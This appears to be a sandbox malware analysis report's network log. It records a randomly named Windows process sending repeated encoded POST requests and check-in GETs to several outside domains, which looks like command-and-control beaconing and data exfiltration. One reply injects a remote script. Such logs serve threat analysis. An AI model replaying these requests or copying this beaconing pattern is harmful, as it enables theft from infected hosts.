                                                      1 | 192.168.2.4 | 49743 | 162.209.189.212 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:44:50.602005959 CEST | 673 | OUT | POST /ooz9/ HTTP/1.1
                                                      Host: www.66hc7.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.66hc7.com
                                                      Referer: http://www.66hc7.com/ooz9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=BntmxfJjJCoQarwnA6OFbjmPgf5bCgkTA3huCk48hkCPcjpBL7ES3rmpYQ2HKJMF+sJFnxt84AZtlVs6LzR12ZUWrub64iQfBlG1KVTmai05bfPzhs4WxOzTfJvh8CK1VQv96Nb5gHdXxMta/uxZ4GYbA3v4CcF0FNHP5IQFus6bx9jvcGN6i8+zlqDcylYnVA==
                                                      Jul 3, 2024 17:44:51.149492025 CEST | 192 | IN | HTTP/1.1 200 OK
                                                      Content-Type: text/html
                                                      Content-Length: 96
                                                      Cache-Control: max-age=2592000
                                                      Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      2 | 192.168.2.4 | 49744 | 162.209.189.212 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:44:53.163980007 CEST | 693 | OUT | POST /ooz9/ HTTP/1.1
                                                      Host: www.66hc7.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.66hc7.com
                                                      Referer: http://www.66hc7.com/ooz9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=BntmxfJjJCoQaLAnCdiFSjmM+v5bZQkXA3tuChASiWmPcGtBK6ESwrmpXw2CFpNJ+sEynzJ84ExtlXk6LA523JUUiOb48iQfBlG1KR+NamY5au/zgJMR3+zQYJvh4CKxVQuQ6MHfgFVXxNdaxfxWzGYddnusLJcbKuW54ZkMtP+75by1N3stw8aA4tKo/mluOOElUqs2HZ6TeIaltOZDbFg=
                                                      Jul 3, 2024 17:44:53.666820049 CEST | 192 | IN | HTTP/1.1 200 OK
                                                      Content-Type: text/html
                                                      Content-Length: 96
                                                      Cache-Control: max-age=2592000
                                                      Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      3 | 192.168.2.4 | 49745 | 162.209.189.212 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:44:55.702852964 CEST | 10775 | OUT | POST /ooz9/ HTTP/1.1
                                                      Host: www.66hc7.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.66hc7.com
                                                      Referer: http://www.66hc7.com/ooz9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:44:56.218441010 CEST | 192 | IN | HTTP/1.1 200 OK
                                                      Content-Type: text/html
                                                      Content-Length: 96
                                                      Cache-Control: max-age=2592000
                                                      Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.4 | 49746 | 162.209.189.212 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:44:58.231606960 CEST | 413 | OUT | GET /ooz9/?lxRlvTSh=MlFGyqpiH0BFSJI/fef/dCG888BGWBIcHVtVHklmmXS6c3kDIZAL8aaEfl7Aaohh3sZenWVq3ThPiwkLLGk004Us/fWH1X98Emf9JC/rX1g9bPHIk5sfq80=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.66hc7.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:44:58.754859924 CEST | 192 | IN | HTTP/1.1 200 OK
                                                      Content-Type: text/html
                                                      Content-Length: 96
                                                      Cache-Control: max-age=2592000
                                                      Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.4 | 49747 | 3.33.130.190 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:03.829102039 CEST | 688 | OUT | POST /el0d/ HTTP/1.1
                                                      Host: www.katgstamps.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.katgstamps.com
                                                      Referer: http://www.katgstamps.com/el0d/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=zST5w+UstY408evDwT/xgRWOVkAcj7uWOf3eZoFTx2wyjtZXx5fEpqYQIfAAWCWnLBGh8ug/lFBDL4nCGEExOnJnNR0rMwgBFjzHS9iDt2foxMJBq6dp0ANS8T7t3Zn2DAk8WVab2Cp1ThQs00zyrv1VEMqyV8F1NZXD0d51tDgVUusSM8aWg+zCFpzZ5i8S2Q==


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.4 | 49748 | 3.33.130.190 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:06.358503103 CEST | 708 | OUT | POST /el0d/ HTTP/1.1
                                                      Host: www.katgstamps.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.katgstamps.com
                                                      Referer: http://www.katgstamps.com/el0d/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=zST5w+UstY409+fDxy/xxBWJL0Ac6ruSOf7eZpRD2EUyjNJX+bnEnKYQA/BEYiW4LBKf8rY/lBpDL9bCGzo+NXJpAx0TRggBFjzHS9mpt2Ho285BsbdqowNT7T7tgJnyDAkeWUHw2Ah1TlYszlz1hv1TAMr9bZYuU63P+f90hzkzRo9IdN7By+XxYu6t0hBbtclL0u1cSxLK0Ae66amt49Y=


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      7 | 192.168.2.4 | 49749 | 3.33.130.190 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:08.890325069 CEST | 10790 | OUT | POST /el0d/ HTTP/1.1
                                                      Host: www.katgstamps.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.katgstamps.com
                                                      Referer: http://www.katgstamps.com/el0d/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      8 | 192.168.2.4 | 49750 | 3.33.130.190 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:12.135445118 CEST | 418 | OUT | GET /el0d/?lxRlvTSh=+Q7ZzK8QtvU36dLJnzucjS+TJ0IzvZmyWs7tRfA/z2Vlh6102r3Lp6tJH45cMzuZYwqpgOtAlm44C9LsA0ZyYXRYfzgEIkIQAxK9duS/lWCJ3udFt4tR1RA=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.katgstamps.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:45:12.643377066 CEST | 398 | IN | HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 03 Jul 2024 15:45:12 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Connection: close
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lxRlvTSh=+Q7ZzK8QtvU36dLJnzucjS+TJ0IzvZmyWs7tRfA/z2Vlh6102r3Lp6tJH45cMzuZYwqpgOtAlm44C9LsA0ZyYXRYfzgEIkIQAxK9duS/lWCJ3udFt4tR1RA=&kh=9PxLvhoHS4"}</script></head></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      9 | 192.168.2.4 | 49751 | 162.0.213.72 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:18.039259911 CEST | 676 | OUT | POST /nm4d/ HTTP/1.1
                                                      Host: www.devele.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.devele.top
                                                      Referer: http://www.devele.top/nm4d/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=C8yaYk0q5IOD9GjBq3M3OWbkkVJJYWDYpa67JP+Ld4PZ61d06t4yiLgiOMouAVyI5X7XNaX0HpiN4UUDwjOQ6z7bv6FmXBd1K9PeTZKQJWMaa0uRMkzos/uN8jHA4ndf9lRopJjGwJSfCEXBIEqLe8CIZpTORvocB8dZ3EB2JpvQCPbVpgqD0J0eRI7wm709qg==
                                                      Jul 3, 2024 17:45:18.656145096 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:18 GMT
                                                      Server: Apache
                                                      Content-Length: 16026
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      10 | 192.168.2.4 | 49752 | 162.0.213.72 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:20.577549934 CEST | 696 | OUT | POST /nm4d/ HTTP/1.1
                                                      Host: www.devele.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.devele.top
                                                      Referer: http://www.devele.top/nm4d/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=C8yaYk0q5IODv17BsRE3M2br6FJJS2CRpaG7JKSbeNXZ5X105vcylLgiGsoREVzl5X3fNbH0Hp2N4QQDwSOT8z7VnaFkYhd1K9PeTZfLJWUabEeRPFznwvuC5THA8ncW9lQNpKn8wLafCBzBIVqKX8COHpSxW+ZsPMlI4n5MPILwDJKP4RLUmJQtMPyEr4J0xp0rY6R4n3kkGtzK6YOeOsU=
                                                      Jul 3, 2024 17:45:21.199917078 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:21 GMT
                                                      Server: Apache
                                                      Content-Length: 16026
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                      Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g> <g> <line fil
                                                      Jul 3, 2024 17:45:21.200141907 CEST1236INData Raw: 36 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69
                                                      Data Ascii: 6" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="484.215" y1="411.146" x2="476.378" y2="411.146" /> </g>
                                                      Jul 3, 2024 17:45:21.200153112 CEST672INData Raw: 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 33 33 2e 33 34 33 22 20 63 79 3d 22 34 37 37 2e 30 31 34 22 20 72 3d 22
                                                      Data Ascii: cap="round" stroke-miterlimit="10" cx="133.343" cy="477.014" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy=
                                                      Jul 3, 2024 17:45:21.200205088 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                                      Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                                      Jul 3, 2024 17:45:21.200218916 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                                      Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
                                                      Jul 3, 2024 17:45:21.205112934 CEST1236INData Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20
                                                      Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      11          192.168.2.4  49753        162.0.213.72    80                3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:45:23.115803957 CEST  10778              OUT        POST /nm4d/ HTTP/1.1
                                                      Host: www.devele.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.devele.top
                                                      Referer: http://www.devele.top/nm4d/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:45:23.720333099 CEST  1236               IN         HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:23 GMT
                                                      Server: Apache
                                                      Content-Length: 16026
                                                      Connection: close
                                                      Content-Type: text/html


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      12          192.168.2.4  49754        162.0.213.72    80                3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:45:25.806210041 CEST  414                OUT        GET /nm4d/?lxRlvTSh=P+a6bS4ig9vwqW/Z6ilpMEzKmUBtQAyMrIuXDLnJaK725R5zxskqpas4OYRfTGLo7FbtQu2SDY/2/wEY0mHxpB/VyP4fcE5gLsO9P5KmHmpeamOBXX7CtdE=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.devele.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:45:26.365411043 CEST  1236               IN         HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:26 GMT
                                                      Server: Apache
                                                      Content-Length: 16026
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      13          192.168.2.4  49755        23.227.38.74    80                3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:45:31.767560959 CEST  694                OUT        POST /k2gj/ HTTP/1.1
                                                      Host: www.valerieomage.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.valerieomage.com
                                                      Referer: http://www.valerieomage.com/k2gj/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=/k25CT6c7t8Bk6fjuA/oNpF4CuwJDTT0DeaQkG3RTwR3+d4YF19k33UpddAyNgnZ9w80mHrS9AZt8FWc8yhotPu4DYgUJtYulXpZKCuYjEXfMo/8mKfAfCAWH/ED5x/NDWldFGD+iCLYrCuO3s0y1B0Bq8uQr0YOCC4YtFNaNL8/xU62v2tzyWbNd2gt7j7nCw==
                                                      Jul 3, 2024 17:45:32.391241074 CEST  1236               IN         HTTP/1.1 302 Found
                                                      Date: Wed, 03 Jul 2024 15:45:32 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Sorting-Hat-PodId: 223
                                                      X-Sorting-Hat-ShopId: 70582403296
                                                      x-frame-options: DENY
                                                      x-shopid: 70582403296
                                                      x-shardid: 223
                                                      content-language: en-US
                                                      x-cache: allow
                                                      location: https://www.valerieomage.com/password
                                                      set-cookie: localization=US; path=/; expires=Thu, 03 Jul 2025 15:45:32 GMT; SameSite=Lax
                                                      x-request-id: 21db27ad-af69-4369-b8ab-1bcdfd9157fb-1720021532
                                                      server-timing: processing;dur=118
                                                      content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=21db27ad-af69-4369-b8ab-1bcdfd9157fb-1720021532
                                                      x-content-type-options: nosniff
                                                      x-download-options: noopen
                                                      x-permitted-cross-domain-policies: none
                                                      x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=21db27ad-af69-4369-b8ab-1bcdfd9157fb-1720021532
                                                      x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                      CF-Cache-Status: DYN
                                                      Data Raw:
                                                      Data Ascii:
                                                      Jul 3, 2024 17:45:32.391258955 CEST466INData Raw: 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73
                                                      Data Ascii: MICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I9KFai8ldlRUmv6dQ54CooaEmU6cktvGPlizEj9BgvDpqtm2%2BHPYAPiFBfCK40gowg%2F40raRO68SQ62PBT74vhq74si7JJoS4UyGz%2FFPtK3sZ5SmD8D9xfCBLHI9Lv60jWDPZQSy"}],"group":"cf-ne
                                                      Jul 3, 2024 17:45:32.392057896 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      14 | 192.168.2.4 | 49756 | 23.227.38.74 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:34.299819946 CEST | 714 | OUT | POST /k2gj/ HTTP/1.1
                                                      Host: www.valerieomage.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.valerieomage.com
                                                      Referer: http://www.valerieomage.com/k2gj/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=/k25CT6c7t8BmaPjoXDoYZF7e+wJaDTwDeeQkEb/QCF3/4UYC3Vkw3UpW9AzCAnS9wwWmGXS9A9t8Emc8Dhrtfu+P4gWHNYulXpZKG+yjADfM7X83fzfcCBkNfEDvx/JDWlzFDjQiAzYrGqO0901mh0Hu8vB7053ExFzsVZjO4gT5yrs+HMkgW/+AxpZ2gGuZyAcf+4s9bTP5aVzY6JZzGc=
                                                      Jul 3, 2024 17:45:34.893969059 CEST | 1236 | IN | HTTP/1.1 302 Found
                                                      Date: Wed, 03 Jul 2024 15:45:34 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Sorting-Hat-PodId: 223
                                                      X-Sorting-Hat-ShopId: 70582403296
                                                      x-frame-options: DENY
                                                      x-shopid: 70582403296
                                                      x-shardid: 223
                                                      content-language: en-US
                                                      x-cache: allow
                                                      location: https://www.valerieomage.com/password
                                                      set-cookie: localization=US; path=/; expires=Thu, 03 Jul 2025 15:45:34 GMT; SameSite=Lax
                                                      x-request-id: 429cdd9f-64b5-44bb-aed9-fd6419ea6c8b-1720021534
                                                      server-timing: processing;dur=93
